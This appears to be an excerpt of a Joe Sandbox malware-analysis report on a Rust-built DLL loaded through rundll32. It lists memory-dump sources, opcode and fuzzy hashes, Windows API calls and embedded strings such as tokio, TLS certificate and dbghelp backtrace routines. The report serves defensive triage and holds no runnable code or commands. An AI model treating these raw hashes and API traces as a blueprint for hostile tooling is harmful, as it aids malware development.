                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: {invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern "
                              • API String ID: 0-1066123878
                              • Opcode ID: e3fb2fd3f7f08921de641e70e403edfbe6e9327de7d42be22fe162c48e2ce1e6
                              • Instruction ID: 8179366a9e44d0b9eec65af0905750f0e6c8fa46718e06a5f6ce66d0a150c0f4
                              • Opcode Fuzzy Hash: e3fb2fd3f7f08921de641e70e403edfbe6e9327de7d42be22fe162c48e2ce1e6
                              • Instruction Fuzzy Hash: 2491E5B1F042118BEF04CE99D8807AAB7B1BF45718F39C569C919ABF86F731D8058792
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: N@
                              • API String ID: 0-1509896676
                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction ID: 4590bd7383b4ecfceca6157ca4dd4c1381756f7bce9cb77f7b5188e0af33872d
                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction Fuzzy Hash: DF614C729003158FDB18CF48C484AAEBBF2FF84314F1AC5AED9095B366D7B1A955CB84
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4e727a621d00d13b420eb3f9e2c247164b0b1b2176a63980fb85778219ce7215
                              • Instruction ID: 0ff48e9463f362da2d00663d80c7e9e429e3fbc13992de4ad6f8074887cbe4e5
                              • Opcode Fuzzy Hash: 4e727a621d00d13b420eb3f9e2c247164b0b1b2176a63980fb85778219ce7215
                              • Instruction Fuzzy Hash: 132238303497C06AC319462995E1A7ABBD1CB99308F18895EF9C5CFF47E960AC4AD353
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 03201e0e03f7247301a9f3b9842e29ce0bf10146ca8ad560d00c21ca95526b81
                              • Instruction ID: bf85461256548dd513dce4fea388fae9642751d3f5c6d9c04df344186edf765c
                              • Opcode Fuzzy Hash: 03201e0e03f7247301a9f3b9842e29ce0bf10146ca8ad560d00c21ca95526b81
                              • Instruction Fuzzy Hash: 14226277E5151A8BDB08CA95CC515D9B3E3BBC8314B1F9129C819E3305EE79BA478BC0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memcmpmemmovememset
                              • String ID:
                              • API String ID: 3819852886-0
                              • Opcode ID: d10e5ff6e179efe6450e7f5fb2321c7a6a1267a6dccef899b8370cb85041ab11
                              • Instruction ID: 8a42b1241f2ac05454cd13958db411483246c199db1653ba5dd563e043147a1c
                              • Opcode Fuzzy Hash: d10e5ff6e179efe6450e7f5fb2321c7a6a1267a6dccef899b8370cb85041ab11
                              • Instruction Fuzzy Hash: 5A125D756087818FC724CF25C490A9BF7E2BFC9354F10891EE9999B750EB70E949CB82
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a18a39034562e4ef56181b6472f78a3d58a52de4784536d304669c9489a0e268
                              • Instruction ID: fd716e50ae1fc95330478c096290ff67302f56a24b71f5906216667f2088ea19
                              • Opcode Fuzzy Hash: a18a39034562e4ef56181b6472f78a3d58a52de4784536d304669c9489a0e268
                              • Instruction Fuzzy Hash: DE2224B0A00B059FDB24DF69C590AAABBF1FF98304F108A6DD95A97755E730B881CB50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29778ac0bfa48734dd999e13bb2fa210d01775d564a6223aaadad449832973f3
                              • Instruction ID: 152762c2ee9edb7f55bcab78b8146858ae17556225c544193685b2b462a39436
                              • Opcode Fuzzy Hash: 29778ac0bfa48734dd999e13bb2fa210d01775d564a6223aaadad449832973f3
                              • Instruction Fuzzy Hash: 83A116B6E29BC14BD302963D9802265F794AFE7284F15D71FFDE072992FB21A2818245
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c295dc9c11afd6b5c65f7781790d4adc694948e870fee69878cbf9a93b5ea678
                              • Instruction ID: acb0fedbddc0ad9947356e602eae98edc5f94bbca4a5debaa2092fece1c948c0
                              • Opcode Fuzzy Hash: c295dc9c11afd6b5c65f7781790d4adc694948e870fee69878cbf9a93b5ea678
                              • Instruction Fuzzy Hash: E6A18A3160C786DFC714CF19C4C165ABBE2EB89318F15892EE8998BB42D770E945CB92
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3093d92d4e69380833eab5e25978ebbfea2a503336af9cd30574c91dc9b678e5
                              • Instruction ID: 1bc0b3af4147ca549d35f8298d9b405dce1d8629f84dc75afe60cbb49525477c
                              • Opcode Fuzzy Hash: 3093d92d4e69380833eab5e25978ebbfea2a503336af9cd30574c91dc9b678e5
                              • Instruction Fuzzy Hash: F0A16D716093829FC704CF15C09065AFBE2FFC9714F16895EE8998B652D770E986CF82
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f42a675b156593e3b90c27f80e174efd7fbdb2be8e0add25d80da928f42a92b
                              • Instruction ID: d4accabae6bf5128fae3c657238961b74bacde00b887fc24a46d067a643fa7c2
                              • Opcode Fuzzy Hash: 7f42a675b156593e3b90c27f80e174efd7fbdb2be8e0add25d80da928f42a92b
                              • Instruction Fuzzy Hash: 3C914CB2A087169FD304CF65C48025AF7E2FFC8754F1ACA2EE9999B641C774E8458BC1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a087bbefd7dd493e46dba76d67e5d68281cfcca480f7f23a2a16b940d04f0816
                              • Instruction ID: a34eb088d7296656cc237de6ba74501d70eea4463562ea3bea067350357c86b3
                              • Opcode Fuzzy Hash: a087bbefd7dd493e46dba76d67e5d68281cfcca480f7f23a2a16b940d04f0816
                              • Instruction Fuzzy Hash: E8713AB2E042658FCB04CFA984902EDFFF1AF59300F1AC26ED475AB392E2754546DB90
                              APIs
                              • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CC4C9F0
                              • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CC4CA04
                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CC4CA36
                              • GetProcAddress.KERNEL32(SymSetOptions), ref: 6CC4CA64
                              • GetProcAddress.KERNEL32(SymInitializeW), ref: 6CC4CA93
                              • GetCurrentProcess.KERNEL32(SymInitializeW), ref: 6CC4CAB1
                              • memset.VCRUNTIME140(00000000,00000000,000007FE), ref: 6CC4CB04
                              • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6CC4CB34
                              • GetCurrentProcess.KERNEL32(SymGetSearchPathW), ref: 6CC4CB48
                              • lstrlenW.KERNEL32(00000002), ref: 6CC4CB5C
                              • memmove.VCRUNTIME140(?,Local\RustBacktraceMutex00000000,00000021), ref: 6CC4CB82
                              • GetCurrentProcessId.KERNEL32 ref: 6CC4CB8A
                              • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6CC4CC0C
                              • CloseHandle.KERNEL32(00000000), ref: 6CC4CC2B
                              • ReleaseMutex.KERNEL32(00000000), ref: 6CC4CC39
                              • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6CC4CCBC
                              • GetCurrentProcess.KERNEL32(EnumerateLoadedModulesW64), ref: 6CC4CCD0
                              • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6CC4CD2E
                              • GetCurrentProcess.KERNEL32(SymSetSearchPathW), ref: 6CC4CD3E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlenmemmovememset
                              • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                              • API String ID: 2639809894-356128008
                              APIs
                              • SetLastError.KERNEL32(00000000), ref: 6CC50227
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6CC50232
                              • GetLastError.KERNEL32 ref: 6CC5023E
                              • GetCurrentProcess.KERNEL32 ref: 6CC5046B
                              • GetCurrentThread.KERNEL32 ref: 6CC50473
                              • memset.VCRUNTIME140(?,00000000,000002D0), ref: 6CC5048A
                              • RtlCaptureContext.KERNEL32(?), ref: 6CC50493
                                • Part of subcall function 6CC4C9B0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CC4C9F0
                                • Part of subcall function 6CC4C9B0: LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CC4CA04
                                • Part of subcall function 6CC4C9B0: GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CC4CA36
                                • Part of subcall function 6CC4C9B0: GetProcAddress.KERNEL32(SymSetOptions), ref: 6CC4CA64
                                • Part of subcall function 6CC4C9B0: GetProcAddress.KERNEL32(SymInitializeW), ref: 6CC4CA93
                                • Part of subcall function 6CC4C9B0: GetCurrentProcess.KERNEL32(SymInitializeW), ref: 6CC4CAB1
                                • Part of subcall function 6CC4C9B0: memset.VCRUNTIME140(00000000,00000000,000007FE), ref: 6CC4CB04
                              • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6CC504C9
                              • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6CC504F2
                              • GetCurrentProcess.KERNEL32(SymGetModuleBase64), ref: 6CC50506
                              • GetProcAddress.KERNEL32(StackWalkEx), ref: 6CC50528
                              • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC5054B
                              • ReleaseMutex.KERNEL32(?), ref: 6CC50651
                              • memset.VCRUNTIME140(?,00000000,00000100,StackWalkEx), ref: 6CC506DD
                              • GetProcAddress.KERNEL32(StackWalk64), ref: 6CC50784
                              • GetLastError.KERNEL32 ref: 6CC50253
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              Strings
                              • SymGetModuleBase64, xrefs: 6CC504E7
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC50808
                              • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CC50678
                              • SymFunctionTableAccess64, xrefs: 6CC504BE
                              • stack backtrace:, xrefs: 6CC503F0
                              • StackWalk64, xrefs: 6CC50779
                              • StackWalkEx, xrefs: 6CC5051D
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$Current$memset$ErrorLastProcess$CaptureContextDirectoryFreeHeapLibraryLoadMutexObjectReleaseSingleThreadWait
                              • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                              • API String ID: 3073563537-3001507533
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC387FA
                                • Part of subcall function 6CC46A27: memmove.VCRUNTIME140(?,00000000,?,?,?,6CC38843), ref: 6CC46A5D
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC38955
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38C1C
                                • Part of subcall function 6CC4738F: CertDuplicateCertificateContext.CRYPT32(?), ref: 6CC47390
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC38A75
                              • FreeContextBuffer.SECUR32(?), ref: 6CC38AB0
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC38B32
                                • Part of subcall function 6CC472E6: CertDuplicateStore.CRYPT32(?), ref: 6CC472E7
                                • Part of subcall function 6CC35A78: memmove.VCRUNTIME140(?,?,00000160,?,?,?,00000000,?,6CC38BE8), ref: 6CC35AA7
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38C39
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38C9A
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38CB8
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38CE7
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38D04
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38D2E
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38D4C
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38D7B
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38D98
                              Strings
                              • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CC38DB5
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$CertContextDuplicate$BufferCertificateFreeStore
                              • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                              • API String ID: 3250603675-1242699868
                              APIs
                              • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,?,6CBF6DA6,?,?,?,?,?,?,6CC63E7A), ref: 6CC6405E
                              • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6CC64070
                              • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6CC64081
                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,6CBF6DA6,?,?,?,?,?,?,6CC63E7A), ref: 6CC64095
                              • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6CC640AB
                              • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6CC640C0
                              • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6CC640D1
                              • CloseHandle.KERNEL32(?,?,C0000000,00000000,00000000,00000000,NtWaitForKeyedEvent,00000000,NtReleaseKeyedEvent,?,?,?,?,?,6CBF6DA6), ref: 6CC64124
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$Handle$Module$Close
                              • String ID: NtCreateKeyedEvent$NtReleaseKeyedEvent$NtWaitForKeyedEvent$WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0.dll$ntdll.dll
                              • API String ID: 3875313662-3409541999
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6CC509F5
                              • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CC50A15
                              • GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CC50A44
                              • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6CC50A8D
                              • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CC50AB8
                              • memset.VCRUNTIME140(?,00000000,00000FF4), ref: 6CC50C41
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000007CF,00000000,00000100,00000000,00000000), ref: 6CC50D46
                              Strings
                              • SymGetLineFromInlineContextW, xrefs: 6CC50A39
                              • SymAddrIncludeInlineTrace, xrefs: 6CC50A82
                              • SymQueryInlineTrace, xrefs: 6CC50AAD
                              • __rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CC510AE
                              • SymFromInlineContextW, xrefs: 6CC50A0A
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$ByteCharCurrentMultiProcessWidememset
                              • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]
                              • API String ID: 3228588488-600644135
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000BC), ref: 6CC3EDCD
                              • memmove.VCRUNTIME140(000000C4,?,0000009C), ref: 6CC3EDED
                                • Part of subcall function 6CC35A78: memmove.VCRUNTIME140(?,?,00000160,?,?,?,00000000,?,6CC38BE8), ref: 6CC35AA7
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC3EE59
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC3EE76
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC3EEA9
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC3EEC7
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC3EEEA
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC3EF0E
                              Strings
                              • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CC3EFB1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                              • API String ID: 2162964266-1242699868
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _memset$_wcsrchr
                              • String ID: D
                              • API String ID: 170005318-2746444292
                              • Opcode ID: 816ba07bf096ff89473f450edf8bc183bb27a2ec5172381af2beb10de3a9835c
                              • Instruction ID: c0963c4c733acc3df27d3129a2705daf599ade1283cb241b957d93867812e5b3
                              • Opcode Fuzzy Hash: 816ba07bf096ff89473f450edf8bc183bb27a2ec5172381af2beb10de3a9835c
                              • Instruction Fuzzy Hash: 0351CBB194032DBAEB20EB60CD85FEE73789F14704F404599E70AEA180FB71B644CBA5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: __aulldiv$ErrorLastPerformanceQuery$CounterFrequency
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 10619572-2333694755
                              • Opcode ID: 6e8490e604a5d195a334899da9f89a19af64ae6e8b4b348bf2953e210ded0c70
                              • Instruction ID: 6c3f91bbc97c04592905b47b6dbffbc2607971e5a62fc543fc9ab823385c7d35
                              • Opcode Fuzzy Hash: 6e8490e604a5d195a334899da9f89a19af64ae6e8b4b348bf2953e210ded0c70
                              • Instruction Fuzzy Hash: 1A514AB1600B008FC724DF69C944B53FBF9AB88714F148A2EE49A97F50E774F4098B91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _memset$_malloc
                              • String ID: ($6$gfff$gfff
                              • API String ID: 3506388080-713438465
                              • Opcode ID: 45c258d321b0b7250ec73ddfe6f5768bca881061f444038ed1c726861de6cd5e
                              • Instruction ID: 216b07d777c99ca3620bae6f881518d5c6ddfc5308d1112b5d298b2b623b2259
                              • Opcode Fuzzy Hash: 45c258d321b0b7250ec73ddfe6f5768bca881061f444038ed1c726861de6cd5e
